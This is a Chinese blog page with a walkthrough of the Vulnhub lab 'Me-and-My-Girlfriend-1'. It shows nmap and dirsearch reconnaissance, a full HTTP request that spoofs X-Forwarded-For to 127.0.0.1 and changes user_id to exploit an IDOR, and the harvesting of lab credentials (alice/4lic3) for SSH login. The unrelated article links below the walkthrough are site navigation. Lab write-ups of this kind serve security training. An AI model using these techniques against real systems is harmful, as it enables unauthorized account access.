当前位置: 首页 > news >正文

Vulnhub:Me-and-My-Girlfriend-1

一.环境启动/信息收集

(1)根据物理地址用nmap的主机发现功能得出IP地址
nmap -P 192.168.138.0/24  //同网段下主机发现得到IP为192.168.138.180(2)做nmap的目录扫描和端口扫描来发现其他站带以及信息
nmap -p- 192.168.138.180
dirsearch http://192.168.138.180
dirb http://192.168.138.180(3)经过目录扫描可以发下该站点下有:/config,/misc,/robots.txt文件
经过端口扫描可以发现有:22,80服务接口(4)访问该站点并将站点下的目录拼接看是否有敏感信息泄露(5)安装插件访问网站

二.漏洞探测/利用

(1)注册登录
改变参数值发现存在平行越权(2)抓取数据包放到重放器构造Payload
GET /index.php?page=profile&user_id=1 HTTP/1.1
Host: 192.168.138.180
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=nul4sc38c6mj0qca3t9ou1vq30
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Priority: u=0, i(3)抓取响应包之后能获取账号与密码
将每个账号与密码都尝试ssh远程连接
alice/4lic3


http://www.mrgr.cn/news/50887.html

相关文章:

  • `concurrent.futures` 是 Python 标准库中的一个模块
  • MySQL 安装和基本使用
  • centOS实用命令
  • XGBoost回归预测 | MATLAB实现XGBoost极限梯度提升树多输入单输出
  • RASIC 决策矩阵
  • 小白也能学会的预测新模型!ReliefF特征选择+XGBoost回归!
  • 【OpenCV】(五)—— 图像融合
  • Chromium 中HTML5 WebSocket实现分析c++(一)
  • UE5学习笔记25-游戏中时间同步
  • 解决关于使用dynamic_cast而导致的程序崩溃的现象
  • ES-入门-javaApi-文档-新增-删除
  • 当代社恐青年的社交解药:跟AI唠嗑上瘾
  • Crawl4AI:用几行代码打造强大的网页爬虫
  • C++运算出现整型溢出
  • ros service不走是为什么
  • “我们为什么缺少科学精神”演讲内容拆解
  • live2d 实时虚拟数字人形象页面显示,对接大模型
  • 机器学习:知识蒸馏(Knowledge Distillation,KD)
  • HTTP状态码
  • java代码编译javac